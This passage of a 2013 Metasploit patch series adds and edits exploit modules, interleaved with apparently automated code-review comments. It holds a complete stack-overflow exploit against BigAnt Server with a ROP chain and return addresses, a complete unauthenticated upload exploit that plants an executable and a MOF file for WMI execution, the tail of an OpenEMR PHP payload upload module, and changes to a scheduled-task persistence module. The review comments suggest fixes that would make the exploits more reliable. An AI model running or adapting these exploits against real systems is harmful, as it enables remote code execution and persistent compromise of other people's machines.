"#{peer} - File wasn't uploaded, aborting!") + end + + register_file_for_cleanup(payload_name) + + print_status("#{peer} - Executing PHP payload (#{payload_name})") + # Execute our payload + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name), + }) + + # If we don't get a 200 when we request our malicious payload, we suspect + # we don't have a shell, either. Print the status code for debugging purposes. + if res and res.code != 200 + print_error("#{peer} - Server returned #{res.code.to_s}") + end + end + +end 
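Review bot: `check` compares versions as strings (`version > "4.1.1"`), which orders correctly only while every component is a single digit; `Gem::Version.new(version) > Gem::Version.new('4.1.1')` states the intent and keeps working if the `\d\.\d\.\d` pattern is later widened. The TARGETURI help text reads 'The base path to EGallery', which looks copied from another module and should name OpenEMR. The reference key `'EBD'` is presumably a typo for `'EDB'`; if so, the entry will not be treated as an Exploit-DB reference.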
From a902480576a904f464b43a365cd002c81361eaf6 Mon Sep 17 00:00:00 2001 From: James Lee <egypt@metasploit.com> Date: Sun, 17 Feb 2013 06:57:35 -0600 Subject: [PATCH 406/421] Break out subclasses into their own files --- lib/rex/proto/smb/simpleclient.rb | 154 +------------------- lib/rex/proto/smb/simpleclient/open_file.rb | 106 ++++++++++++++ lib/rex/proto/smb/simpleclient/open_pipe.rb | 57 ++++++++ 3 files changed, 168 insertions(+), 149 deletions(-) create mode 100644 lib/rex/proto/smb/simpleclient/open_file.rb create mode 100644 lib/rex/proto/smb/simpleclient/open_pipe.rb diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb index 454a3c694e75..c0cd9d02e99f 100644 --- a/lib/rex/proto/smb/simpleclient.rb +++ b/lib/rex/proto/smb/simpleclient.rb @@ -12,6 +12,8 @@ class SimpleClient require 'rex/proto/smb/crypt' require 'rex/proto/smb/utils' require 'rex/proto/smb/client' +require 'rex/proto/smb/simpleclient/open_file' +require 'rex/proto/smb/simpleclient/open_pipe' # Some short-hand class aliases CONST = Rex::Proto::SMB::Constants 
@@ -20,157 +22,11 @@ class SimpleClient XCEPT = Rex::Proto::SMB::Exceptions EVADE = Rex::Proto::SMB::Evasions - - class OpenFile - attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size - - def initialize(client, name, tree_id, file_id) - self.client = client - self.name = name - self.tree_id = tree_id - self.file_id = file_id - self.chunk_size = 48000 - end - - def delete - begin - self.close - rescue - end - self.client.delete(self.name, self.tree_id) - end - - # Close this open file - def close - self.client.close(self.file_id, self.tree_id) - end - - # Read data from the file - def read(length = nil, offset = 0) - if (length == nil) - data = '' - fptr = offset - ok = self.client.read(self.file_id, fptr, self.chunk_size) - while (ok and ok['Payload'].v['DataLenLow'] > 0) - buff = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - data << buff - if ok['Payload'].v['Remaining'] == 0 - break - end - fptr += ok['Payload'].v['DataLenLow'] - - begin - ok = self.client.read(self.file_id, fptr, self.chunk_size) - rescue XCEPT::ErrorCode => e - case e.error_code - when 0x00050001 - # Novell fires off an access denied error on EOF - ok = nil - else - raise e - end - end - end - - return data - else - ok = self.client.read(self.file_id, offset, length) - data = ok.to_s.slice( - ok['Payload'].v['DataOffset'] + 4, - ok['Payload'].v['DataLenLow'] - ) - return data - end - end - - def << (data) - self.write(data) - end - - # Write data to the file - def write(data, offset = 0) - # Track our offset into the remote file - fptr = offset - - # Duplicate the data so we can use slice! 
- data = data.dup - - # Take our first chunk of bytes - chunk = data.slice!(0, self.chunk_size) - - # Keep writing data until we run out - while (chunk.length > 0) - ok = self.client.write(self.file_id, fptr, chunk) - cl = ok['Payload'].v['CountLow'] - - # Partial write, push the failed data back into the queue - if (cl != chunk.length) - data = chunk.slice(cl - 1, chunk.length - cl) + data - end - - # Increment our painter and grab the next chunk - fptr += cl - chunk = data.slice!(0, self.chunk_size) - end - end - end - - class OpenPipe < OpenFile - - # Valid modes are: 'trans' and 'rw' - attr_accessor :mode - - def initialize(*args) - super(*args) - self.mode = 'rw' - @buff = '' - end - - def read_buffer(length, offset=0) - length ||= @buff.length - @buff.slice!(0, length) - end - - def read(length = nil, offset = 0) - case self.mode - when 'trans' - read_buffer(length, offset) - when 'rw' - super(length, offset) - else - raise ArgumentError - end - end - - def write(data, offset = 0) - case self.mode - - when 'trans' - write_trans(data, offset) - when 'rw' - super(data, offset) - else - raise ArgumentError - end - end - - def write_trans(data, offset=0) - ack = self.client.trans_named_pipe(self.file_id, data) - doff = ack['Payload'].v['DataOffset'] - dlen = ack['Payload'].v['DataCount'] - @buff << ack.to_s[4+doff, dlen] - end - end - - # Public accessors -attr_accessor :last_error +attr_accessor :last_error # Private accessors -attr_accessor :socket, :client, :direct, :shares, :last_share +attr_accessor :socket, :client, :direct, :shares, :last_share # Pass the socket object and a boolean indicating whether the socket is netbios or cifs def initialize(socket, direct = false) 
@@ -180,7 +36,7 @@ def initialize(socket, direct = false) self.shares = { } end - def login( name = '', user = '', pass = '', domain = '', + def login(name = '', user = '', pass = '', domain = '', verify_signature = false, usentlmv2 = false, usentlm2_session = true, send_lm = true, use_lanman_key = false, send_ntlm = true, native_os = 'Windows 2000 2195', native_lm = 'Windows 2000 5.0', spnopt = {}) diff --git a/lib/rex/proto/smb/simpleclient/open_file.rb b/lib/rex/proto/smb/simpleclient/open_file.rb new file mode 100644 index 000000000000..66696dfae43b --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_file.rb 
@@ -0,0 +1,106 @@ +# -*- coding: binary -*- +module Rex +module Proto +module SMB +class SimpleClient + +class OpenFile + attr_accessor :name, :tree_id, :file_id, :mode, :client, :chunk_size + + def initialize(client, name, tree_id, file_id) + self.client = client + self.name = name + self.tree_id = tree_id + self.file_id = file_id + self.chunk_size = 48000 + end + + def delete + begin + self.close + rescue + end + self.client.delete(self.name, self.tree_id) + end + + # Close this open file + def close + self.client.close(self.file_id, self.tree_id) + end + + # Read data from the file + def read(length = nil, offset = 0) + if (length == nil) + data = '' + fptr = offset + ok = self.client.read(self.file_id, fptr, self.chunk_size) + while (ok and ok['Payload'].v['DataLenLow'] > 0) + buff = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + data << buff + if ok['Payload'].v['Remaining'] == 0 + break + end + fptr += ok['Payload'].v['DataLenLow'] + + begin + ok = self.client.read(self.file_id, fptr, self.chunk_size) + rescue XCEPT::ErrorCode => e + case e.error_code + when 0x00050001 + # Novell fires off an access denied error on EOF + ok = nil + else + raise e + end + end + end + + return data + else + ok = self.client.read(self.file_id, offset, length) + data = ok.to_s.slice( + ok['Payload'].v['DataOffset'] + 4, + ok['Payload'].v['DataLenLow'] + ) + return data + end + end + + def << (data) + self.write(data) + end + + # Write data to the file + def write(data, offset = 0) + # Track our offset into the remote file + fptr = offset + + # Duplicate the data so we can use slice! 
+ data = data.dup + + # Take our first chunk of bytes + chunk = data.slice!(0, self.chunk_size) + + # Keep writing data until we run out + while (chunk.length > 0) + ok = self.client.write(self.file_id, fptr, chunk) + cl = ok['Payload'].v['CountLow'] + + # Partial write, push the failed data back into the queue + if (cl != chunk.length) + data = chunk.slice(cl - 1, chunk.length - cl) + data + end + + # Increment our painter and grab the next chunk + fptr += cl + chunk = data.slice!(0, self.chunk_size) + end + end +end +end +end +end +end diff --git a/lib/rex/proto/smb/simpleclient/open_pipe.rb b/lib/rex/proto/smb/simpleclient/open_pipe.rb new file mode 100644 index 000000000000..387ee4ff9ab7 --- /dev/null +++ b/lib/rex/proto/smb/simpleclient/open_pipe.rb @@ -0,0 +1,57 @@ +# -*- coding: binary -*- + +module Rex +module Proto +module SMB +class SimpleClient + +class OpenPipe < OpenFile + + # Valid modes are: 'trans' and 'rw' + attr_accessor :mode + + def initialize(*args) + super(*args) + self.mode = 'rw' + @buff = '' + end + + def read_buffer(length, offset=0) + length ||= @buff.length + @buff.slice!(0, length) + end + + def read(length = nil, offset = 0) + case self.mode + when 'trans' + read_buffer(length, offset) + when 'rw' + super(length, offset) + else + raise ArgumentError + end + end + + def write(data, offset = 0) + case self.mode + + when 'trans' + write_trans(data, offset) + when 'rw' + super(data, offset) + else + raise ArgumentError + end + end + + def write_trans(data, offset=0) + ack = self.client.trans_named_pipe(self.file_id, data) + doff = ack['Payload'].v['DataOffset'] + dlen = ack['Payload'].v['DataCount'] + @buff << ack.to_s[4+doff, dlen] + end +end +end +end +end +end From a8d574e4ce0437f4a8d57ee1f47ea99067d55935 Mon Sep 17 00:00:00 2001 
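Review bot: In `OpenFile#write` the partial-write path requeues `chunk.slice(cl - 1, chunk.length - cl)`, which starts one byte too early and ends one byte short, so the last acknowledged byte is sent again and the final byte of the chunk is lost. The unwritten tail is `chunk.slice(cl, chunk.length - cl)`. The code was moved here unchanged from simpleclient.rb, so the defect predates this commit, but the new file is a natural place to correct it. `OpenFile#delete` also discards every error from `close` with a bare `rescue`; a comment saying why that is intended would help the next reader.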
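Review bot: open_pipe.rb declares `class OpenPipe < OpenFile` without loading open_file.rb itself, so it works only because simpleclient.rb requires the two files in that order; adding `require 'rex/proto/smb/simpleclient/open_file'` at the top makes the file loadable on its own. Both `read` and `write` end in a bare `raise ArgumentError`; `raise ArgumentError, "unknown pipe mode #{mode.inspect}"` would tell the caller what was wrong. `read_buffer` accepts `offset` and never uses it, which deserves a comment.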
From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Sun, 17 Feb 2013 14:08:33 -0500 Subject: [PATCH 407/421] Updated one print_status --- modules/exploits/windows/local/s4u_persistence.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 1d5d2cc0bb29..e6197463c52f 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -163,7 +163,7 @@ def create_xml(rexe_path) ut = vt['lpSystemTime'].unpack("v*") t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5]) rescue - print_warning("Could not read system time from victim...using your local time to determine expire date") + print_warning("Could not read system time from victim...using your local time to determine creation date") t = ::Time.now end date = t.strftime("%Y-%m-%d") From 1a2a0bc38e44edc2c6dfec5a7e641788ef6962ba Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:21:45 +0100 Subject: [PATCH 408/421] Added module for CVE-2012-6275 --- .../misc/bigant_server_sch_dupf_bof.rb | 183 ++++++++++++++++++ 1 file changed, 183 insertions(+) create mode 100644 modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb diff --git a/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb new file mode 100644 index 000000000000..fd560463cd2e --- /dev/null +++ b/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb 
@@ -0,0 +1,183 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = NormalRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BigAnt Server SCH And DUPF Buffer Overflow', + 'Description' => %q{ + This exploits a stack buffer overflow in the BigAnt Server 2.97 SP7. The + vulnerability is due to the dangerous usage of strcpy while handling errors. This + module uses a combination of SCH and DUPF request to trigger the vulnerability and + has been tested successfully against version 2.97 SP7 over Windows XP SP3 and + Windows 2003 SP2. + }, + 'Author' => + [ + 'Hamburgers Maccoy', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6275' ], + [ 'US-CERT-VU', '990652' ], + [ 'BID', '57214' ], + [ 'OSVDB', '89344' ] + ], + 'Payload' => + { + 'Space' => 2500, + 'BadChars' => "\x00\x0a\x0d\x25\x27", + 'DisableNops' => true, + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BigAnt Server 2.97 SP7 / Windows XP SP3', + { + 'Offset' => 629, + 'Ret' => 0x77c21ef4, # ppr from msvcrt + 'JmpESP' => 0x77c35459, # push esp # ret from msvcrt + 'FakeObject' => 0x77C60410 # .data from msvcrt + } + ], + [ 'BigAnt Server 2.97 SP7 / Windows 2003 SP2', + { + 'Offset' => 629, + 'Ret' => 0x77bb287a, # ppr from msvcrt + 'FakeObject' => 0x77bf2460, # .data from msvcrt + :callback_rop => :w2003_sp2_rop + } + ] + ], + 'Privileged' => true, + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jan 09 2013')) + + register_options([Opt::RPORT(6661)], self.class) + end + + def junk(n=4) + return 
rand_text_alpha(n).unpack("V")[0].to_i + end + + def nop + return make_nops(4).unpack("V")[0].to_i + end + + def w2003_sp2_rop + rop_gadgets = + [ + 0x77bc5d88, # POP EAX # RETN + 0x77ba1114, # <- *&VirtualProtect() + 0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN + junk, + 0x77bb0c86, # XCHG EAX,ESI # RETN + 0x77bc9801, # POP EBP # RETN + 0x77be2265, # ptr to 'push esp # ret' + 0x77bc5d88, # POP EAX # RETN + 0x03C0990F, + 0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) + 0x77bb48d3, # POP EBX, RET + 0x77bf21e0, # .data + 0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN + 0x77bbfc02, # POP ECX # RETN + 0x77bef001, # W pointer (lpOldProtect) (-> ecx) + 0x77bd8c04, # POP EDI # RETN + 0x77bd8c05, # ROP NOP (-> edi) + 0x77bc5d88, # POP EAX # RETN + 0x03c0984f, + 0x77bdd441, # SUB EAX, 03c0940f + 0x77bb8285, # XCHG EAX,EDX # RETN + 0x77bc5d88, # POP EAX # RETN + nop, + 0x77be6591, # PUSHAD # ADD AL,0EF # RETN + ].pack("V*") + + return rop_gadgets + end + + def exploit + + sploit = rand_text_alpha(target['Offset']) + sploit << [target.ret].pack("V") + sploit << [target['FakeObject']].pack("V") + sploit << [target['FakeObject']].pack("V") + if target[:callback_rop] and self.respond_to?(target[:callback_rop]) + sploit << self.send(target[:callback_rop]) + else + sploit << [target['JmpESP']].pack("V") + end + sploit << payload.encoded + + random_filename = rand_text_alpha(4) + random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" + random_userid = rand_text_numeric(1) + random_username = rand_text_alpha_lower(5) + random_content = rand_text_alpha(10 + rand(10)) + + sch = "SCH 16\n" + sch << "cmdid: 1\n" + sch << "content-length: 0\n" + sch << "content-type: Appliction/Download\n" + sch << "filename: #{random_filename}.txt\n" + sch << "modified: #{random_date}\n" + sch << "pclassid: 102\n" + sch << "pobjid: 1\n" + sch << "rootid: 1\n" + sch 
<< "sendcheck: 1\n" + sch << "source_cmdname: DUPF\n" + sch << "source_content-length: 116619\n" + sch << "userid: #{random_userid}\n" + sch << "username: #{sploit}\n\n" + + print_status("Trying target #{target.name}...") + + connect + print_status("Sending SCH request...") + sock.put(sch) + res = sock.get_once + if res.nil? + fail_with(Exploit::Failure::Unknown, "No response to the SCH request") + end + if res=~ /scmderid: \{(.*)\}/ + scmderid = $1 + else + fail_with(Exploit::Failure::UnexpectedReply, "scmderid value not found in the SCH response") + end + + dupf = "DUPF 16\n" + dupf << "cmdid: 1\n" + dupf << "content-length: #{random_content.length}\n" + dupf << "content-type: Appliction/Download\n" + dupf << "filename: #{random_filename}.txt\n" + dupf << "modified: #{random_date}\n" + dupf << "pclassid: 102\n" + dupf << "pobjid: 1\n" + dupf << "rootid: 1\n" + dupf << "scmderid: {#{scmderid}}\n" + dupf << "sendcheck: 1\n" + dupf << "userid: #{random_userid}\n" + dupf << "username: #{random_username}\n\n" + dupf << random_content + + print_status("Sending DUPF request...") + sock.put(dupf) + #sock.get_once + disconnect + + end + +end From 31a3a374c3efd9c979a8b0a6f4d5ee6bc72b5daf Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:25:39 +0100 Subject: [PATCH 409/421] Added module for CVE-2012-6274 --- .../windows/misc/bigant_server_dupf_upload.rb | 126 ++++++++++++++++++ 1 file changed, 126 insertions(+) create mode 100644 modules/exploits/windows/misc/bigant_server_dupf_upload.rb diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb new file mode 100644 index 000000000000..8f55b2df4cfa --- /dev/null +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb 
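Review bot: The commented-out `#sock.get_once` before `disconnect` in `exploit` is dead code; either remove it or replace it with a comment explaining why the DUPF response is deliberately not read. The `scmderid` capture relies on the global `$1`, where `Regexp.last_match(1)` or a named capture reads more clearly. The target hashes mix string keys (`'Offset'`, `'Ret'`) with a symbol key (`:callback_rop`); using one key style throughout would avoid lookups that miss silently.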
@@ -0,0 +1,126 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + include Msf::Exploit::EXE + include Msf::Exploit::WbemExec + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'BigAnt Server DUPF Command Arbitrary File Upload', + 'Description' => %q{ + This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. + A lack of authentication allows to make unauthenticated file uploads through a DUPF + command. Additionally the filename option in the same command can be used to launch + a directory traversal attack and achieve arbitrary file upload. + + The module uses uses the Windows Management Instrumentation service to execute an + arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It + has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2. 
+ }, + 'Author' => + [ + 'Hamburgers Maccoy', # Vulnerability discovery + 'juan vazquez' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2012-6274' ], + [ 'US-CERT-VU', '990652' ], + [ 'BID', '57214' ], + [ 'OSVDB', '89342' ] + ], + 'Privileged' => true, + 'Platform' => 'win', + 'Targets' => + [ + [ 'BigAnt Server 2.97 SP7', { } ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'WfsDelay' => 10 + }, + 'DisclosureDate' => 'Jan 09 2013')) + + register_options( + [ + Opt::RPORT(6661), + OptInt.new('DEPTH', [true, "Levels to reach base directory", 6]) + ], self.class) + + end + + def upload_file(filename, content) + + random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}" + + dupf = "DUPF 16\n" + dupf << "cmdid: 1\n" + dupf << "content-length: #{content.length}\n" + dupf << "content-type: Appliction/Download\n" + dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n" + dupf << "modified: #{random_date}\n" + dupf << "pclassid: 102\n" + dupf << "pobjid: 1\n" + dupf << "rootid: 1\n" + dupf << "sendcheck: 1\n\n" + dupf << content + + print_status("sending DUPF") + connect + sock.put(dupf) + res = sock.get_once + disconnect + return res + + end + + def exploit + + peer = "#{rhost}:#{rport}" + + # Setup the necessary files to do the wbemexec trick + exe_name = rand_text_alpha(rand(10)+5) + '.exe' + exe = generate_payload_exe + mof_name = rand_text_alpha(rand(10)+5) + '.mof' + mof = generate_mof(mof_name, exe_name) + + print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) + if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ + print_good("#{peer} - #{exe_name} uploaded successfully") + else + if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ + print_error("#{peer} - Upload failed, check 
the DEPTH option") + end + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") + end + + print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) + if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ + print_good("#{peer} - #{mof_name} uploaded successfully") + register_file_for_cleanup(exe_name) + register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") + else + if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ + print_error("#{peer} - Upload failed, check the DEPTH option") + end + fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") + end + + end + +end From 322fa53d490b007164229f0ae3ef1874b72744bd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Sun, 17 Feb 2013 20:29:41 +0100 Subject: [PATCH 410/421] fix typo --- modules/exploits/windows/misc/bigant_server_dupf_upload.rb | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index 8f55b2df4cfa..bed756cb52aa 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -26,7 +26,8 @@ def initialize(info = {}) The module uses uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It - has been successfully tested on BigAnt Server 2.97 SP7 Windows XP SP3 and 2003 SP2. + has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 + SP2. }, 'Author' => [ From 25f8a7dcb9d39ff975d8daf1eeff83646438716d Mon Sep 17 00:00:00 2001 
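Review bot: In `exploit`, the failure branch after the .mof upload still tests `res =~ /#{exe_name}/`, copied from the .exe branch, so the "check the DEPTH option" hint presumably never fires for a reply that names the .mof file; it should read `res =~ /#{Regexp.escape(mof_name)}/`. Both status lines say "Sending HTTP ConvertFile Request" although `upload_file` writes a DUPF command to a raw TCP socket, which makes the module's output misleading when it is compared with a packet capture or server log. The `(\d+)` group in `/fileid: (\d+)/` is never read and can be dropped.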
From: Thomas McCarthy <smilingraccoon@gmail.com> Date: Sun, 17 Feb 2013 22:35:52 -0500 Subject: [PATCH 411/421] Fix expire tag logic and slight clean up Was a dumbass again and didn't fully understand how Optints worked when left blank at run time. If not 0 the expire tag will be inserted now. Also made it print the xpath if used because I believe it will be of value to the user for trouble shooting. --- .../exploits/windows/local/s4u_persistence.rb | 22 +++++++++++-------- 1 file changed, 13 insertions(+), 9 deletions(-) diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index e6197463c52f..5eaad52e4db3 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,7 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], - 'DisclosureDate' => [ 'Jan 2 2013' ], + 'DisclosureDate' => [ 'Jan 2 2013' ], # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -207,8 +207,9 @@ def add_xml_triggers(xml) if not datastore['XPATH'].nil? # Append xpath queries line << " and #{datastore['XPATH']}" + # Print XPath query, useful to user to spot issues with uncommented single quotes + print_status("XPath query: #{line}") end - vprint_status("XPath query: #{line}") xml = create_trigger_event_tags(datastore['EVENT_LOG'], line, xml) 
@@ -222,12 +223,15 @@ def add_xml_triggers(xml) end xml = xml.sub(/<Interval>.*?</, "<Interval>PT#{minutes}M<") - # Generate expire tag - end_boundary = create_expire_tag if datastore['EXPIRE_TIME'] + # Insert expire tag if not 0 + unless datastore['EXPIRE_TIME'] == 0 + # Generate expire tag + end_boundary = create_expire_tag - # Inject expire tag - insert = xml.index("</StartBoundary>") - xml.insert(insert + 16, "\n #{end_boundary}") + # Inject expire tag + insert = xml.index("</StartBoundary>") + xml.insert(insert + 16, "\n #{end_boundary}") + end end return xml end @@ -266,7 +270,7 @@ def create_trigger_tags(trig, xml) # Create session state trigger, weird spacing used to maintain # natural Winadows spacing for XML export temp_xml = "<SessionStateChangeTrigger>\n" - temp_xml << " #{create_expire_tag}" if not datastore['EXPIRE_TIME'] + temp_xml << " #{create_expire_tag}" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <StateChange>#{trig}</StateChange>\n" temp_xml << " <UserId>#{domain}\\#{user}</UserId>\n" @@ -286,7 +290,7 @@ def create_trigger_event_tags(log, line, xml) # Fscked up XML syntax for windows event #{id} in #{log}, weird spacind # used to maintain natural Windows spacing for XML export temp_xml = "<EventTrigger>\n" - temp_xml << " #{create_expire_tag}\n" if not datastore['EXPIRE_TIME'] + temp_xml << " #{create_expire_tag}\n" unless datastore['EXPIRE_TIME'] == 0 temp_xml << " <Enabled>true</Enabled>\n" temp_xml << " <Subscription><QueryList><Query Id=\"0\" " temp_xml << "Path=\"#{log}\"><Select Path=\"#{log}\">" From 416a7aeaa3bfe064a65759c1313a12f9ef058892 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:23:06 +0100 Subject: [PATCH 412/421] make msftidy happy for s4u_persistence --- modules/exploits/windows/local/s4u_persistence.rb | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) 
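Review bot: The expire-tag injection in `add_xml_triggers` calls `xml.insert(insert + 16, ...)` without checking that `xml.index("</StartBoundary>")` found the tag, so a template lacking it fails with NoMethodError on nil; add `fail_with(Exploit::Failure::Unknown, "No StartBoundary tag in task XML") if insert.nil?` and replace the literal 16 with `"</StartBoundary>".length`. The new `unless datastore['EXPIRE_TIME'] == 0` test, repeated in the `create_trigger_tags` and `create_trigger_event_tags` hunks, also passes when the option is nil, so it is worth confirming how a blank OptInt is normalised before relying on it. In `create_trigger_tags` the inserted tag has no trailing "\n" while the `create_trigger_event_tags` line has one, which looks unintended unless `create_expire_tag` already ends with a newline. `add_xml_triggers` starts and ends outside the hunk.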
diff --git a/modules/exploits/windows/local/s4u_persistence.rb b/modules/exploits/windows/local/s4u_persistence.rb index 5eaad52e4db3..188b8e643c28 100644 --- a/modules/exploits/windows/local/s4u_persistence.rb +++ b/modules/exploits/windows/local/s4u_persistence.rb @@ -39,7 +39,7 @@ def initialize(info={}) 'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ], 'Targets' => [ [ 'Windows', {} ] ], - 'DisclosureDate' => [ 'Jan 2 2013' ], # Date of scriptjunkie's blog post + 'DisclosureDate' => 'Jan 2 2013', # Date of scriptjunkie's blog post 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'http://www.pentestgeek.com/2013/02/11/scheduled-tasks-with-s4u-and-on-demand-persistence/'], @@ -141,7 +141,6 @@ def upload_rexe(path, payload) begin write_file(path, payload) rescue => e - puts e fail_with(Exploit::Failure::Unknown, "Could not upload to #{path}") end print_status("Successfully uploaded remote executable to #{path}") @@ -152,7 +151,7 @@ def upload_rexe(path, payload) # Returns normal XML for generic task def create_xml(rexe_path) - xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence") + xml_path = File.join(Msf::Config.install_root, "data", "exploits", "s4u_persistence.xml") xml_file = File.new(xml_path,"r") xml = xml_file.read xml_file.close @@ -204,7 +203,7 @@ def add_xml_triggers(xml) when 'event' line = "*[System[(EventID=#{datastore['EVENT_ID']})]]" - if not datastore['XPATH'].nil? + if not datastore['XPATH'].nil? and not datastore['XPATH'].empty? # Append xpath queries line << " and #{datastore['XPATH']}" # Print XPath query, useful to user to spot issues with uncommented single quotes @@ -226,8 +225,7 @@ def add_xml_triggers(xml) # Insert expire tag if not 0 unless datastore['EXPIRE_TIME'] == 0 # Generate expire tag - end_boundary = create_expire_tag - + end_boundary = create_expire_tag # Inject expire tag insert = xml.index("</StartBoundary>") xml.insert(insert + 16, "\n #{end_boundary}") 
From c8778587f5233f49eb0f86cb15e2e018bb66daa8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:25:03 +0100 Subject: [PATCH 413/421] rename the xml template for s4u --- data/exploits/{s4u_persistence => s4u_persistence.xml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename data/exploits/{s4u_persistence => s4u_persistence.xml} (100%) diff --git a/data/exploits/s4u_persistence b/data/exploits/s4u_persistence.xml similarity index 100% rename from data/exploits/s4u_persistence rename to data/exploits/s4u_persistence.xml From 9af43bc05c4b98d4cabe616579a07eb34399eccd Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan.vazquez@metasploit.com> Date: Mon, 18 Feb 2013 15:58:29 +0100 Subject: [PATCH 414/421] newline to sap_default.txt --- data/wordlists/sap_default.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/data/wordlists/sap_default.txt b/data/wordlists/sap_default.txt index 2102fd069bf3..fc64ceb34b36 100644 --- a/data/wordlists/sap_default.txt +++ b/data/wordlists/sap_default.txt @@ -14,4 